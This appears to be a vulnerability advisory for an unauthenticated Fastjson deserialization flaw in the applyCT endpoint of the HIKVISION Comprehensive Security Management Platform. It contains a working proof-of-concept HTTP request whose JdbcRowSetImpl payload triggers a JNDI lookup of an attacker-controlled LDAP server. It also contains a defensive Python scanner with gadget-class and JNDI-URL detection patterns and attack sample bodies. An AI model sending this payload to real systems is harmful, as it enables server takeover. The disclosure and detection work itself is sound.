HIKVISION Comprehensive Security Management Platform applyCT Fastjson Remote Command Execution Vulnerability
Vulnerability Description
The applyCT endpoint (/bic/ssoService/v1/applyCT) of the HIKVISION Comprehensive Security Management Platform deserializes the request body with an outdated version of Fastjson. The payload shape used below is the well-known Fastjson 1.2.25 to 1.2.47 autoType bypass: the first object, typed as java.lang.Class with a val of com.sun.rowset.JdbcRowSetImpl, primes Fastjson's class cache, so the second object's @type of com.sun.rowset.JdbcRowSetImpl is accepted even with autoType disabled. Setting autoCommit on the resulting JdbcRowSetImpl calls connect(), which performs a JNDI lookup of the attacker-controlled dataSourceName (an ldap:// URL). An unauthenticated attacker can turn that lookup into arbitrary command execution and take over the server. Whether the lookup leads to code execution also depends on the target JVM: remote class loading over LDAP works only on old JDKs (before 8u191); on newer ones the LDAP response must instead carry a serialized object that deserializes through a gadget already on the target's classpath.
Vulnerability Impact
HIKVISION Comprehensive Security Management Platform
Network mapping
Vulnerability reproduction
Login page
Verify the PoC
```http
POST /bic/ssoService/v1/applyCT HTTP/1.1
Content-Type: application/json

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
```

Replace xxx.xxx.xxx.xxx with the address of an LDAP server you control. The trailing random key only pads the object; it plays no part in the deserialization chain.
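The request above has two tell-tale features a defender can look for in traffic to this platform: an @type key that names a Fastjson gadget class (or smuggles it in through the java.lang.Class / val cache-priming trick), and a JNDI URL in a string value such as dataSourceName. The following scanner is an added example written for this page, not code from the original post or from Hikvision; it walks a JSON request body and reports both signs. The gadget list, the sample bodies and the helper names are assumptions constructed for the example.

```python
"""Flag Fastjson autoType abuse in JSON request bodies (added example)."""
import json
import re
from typing import Any, Iterator

# Illustrative list of classes commonly abused as Fastjson gadgets; not exhaustive.
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "com.mchange.v2.c3p0.JndiRefForwardingDataSource",
}

# JNDI provider URLs that turn a lookup into remote code loading or deserialization.
JNDI_URL = re.compile(r"^\s*(ldaps?|rmi|iiop|dns)://", re.IGNORECASE)


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json_path, value) for every node of the parsed document, depth first."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}[{index}]")


def scan_body(body: str) -> list[dict]:
    """Return findings as {path, kind, detail}; kind is one of
    cache_prime, gadget_type, autotype, jndi_url."""
    findings: list[dict] = []
    try:
        doc = json.loads(body)
    except ValueError:
        # Caveat: Fastjson accepts input Python's json rejects (single quotes,
        # unquoted keys, comments). A production filter must parse the way the
        # target parses, or fail closed on unparseable bodies.
        return findings
    for path, node in walk(doc):
        if isinstance(node, dict) and isinstance(node.get("@type"), str):
            type_name = node["@type"]
            if type_name == "java.lang.Class" and node.get("val") in GADGET_CLASSES:
                # Stage one of the 1.2.25-1.2.47 bypass: load the gadget into the cache.
                findings.append({"path": path, "kind": "cache_prime", "detail": node["val"]})
            elif type_name in GADGET_CLASSES:
                # Stage two: instantiate the gadget directly by @type.
                findings.append({"path": path, "kind": "gadget_type", "detail": type_name})
            else:
                # Any client-supplied @type is worth logging even if the class is unknown.
                findings.append({"path": path, "kind": "autotype", "detail": type_name})
        elif isinstance(node, str) and JNDI_URL.match(node):
            findings.append({"path": path, "kind": "jndi_url", "detail": node.strip()})
    return findings


def should_block(body: str) -> bool:
    """Block on any gadget or JNDI indicator; a bare @type is only logged."""
    return any(f["kind"] != "autotype" for f in scan_body(body))


# Constructed sample bodies. POC_BODY mirrors the request shown above with a
# placeholder host; the others are benign, nested and evasion variants.
POC_BODY = (
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},'
    '"hfe4zyyzldp":"="}'
)
BENIGN_BODY = '{"username":"operator","ticket":"ST-1234","lang":"en"}'
NESTED_BODY = (
    '{"items":[{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":" RMI://attacker.example/x","autoCommit":true}]}'
)
AUTOTYPE_ONLY_BODY = '{"@type":"com.example.Dto","name":"x"}'

if __name__ == "__main__":
    for label, body in [("poc", POC_BODY), ("benign", BENIGN_BODY),
                        ("nested", NESTED_BODY), ("autotype", AUTOTYPE_ONLY_BODY)]:
        print(label, should_block(body), scan_body(body))
```

On the PoC body the scanner reports the cache-priming object at $.a, the gadget @type at $.b and the LDAP URL at $.b.dataSourceName, and should_block returns True; the benign body produces no findings. Matching on the JSON tree rather than on raw substrings keeps the check insensitive to key order, nesting and whitespace, which a simple grep for "JdbcRowSetImpl" is not.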
This post is licensed under CC BY 4.0 by the author.